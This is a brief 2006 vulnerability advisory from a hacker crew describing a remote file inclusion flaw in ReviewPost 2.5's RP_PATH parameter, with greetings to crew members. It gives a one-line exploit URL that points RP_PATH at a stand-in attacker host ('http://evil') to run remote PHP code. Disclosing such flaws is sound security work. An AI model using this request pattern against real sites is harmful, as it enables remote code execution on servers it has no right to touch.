#############################Solpot Crew Community############################## # # ReviewPost 2.5 (RP_PATH) Remote File Inclusion # # Donwload File : http://3-bius.com/ReviewPost.zip # ################################################################################# # # # Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006) # # contact: bius@mac.com # # Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt # ################################################################################ # # # Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry # imam26_it,ant1casper(tolong tambahin ya) # #nyubi , #hitamputih @dalnet # and all member solpotcrew community # http://www.nyubicrew.org/forum/ # especially thx to Solpot @ nyubi@dal.net # ############################################################################### Input passed to the "RP_PATH" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from index.php nb : others file has vulnerable too :) exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil ############################################################################# ######################################E.O.F##################################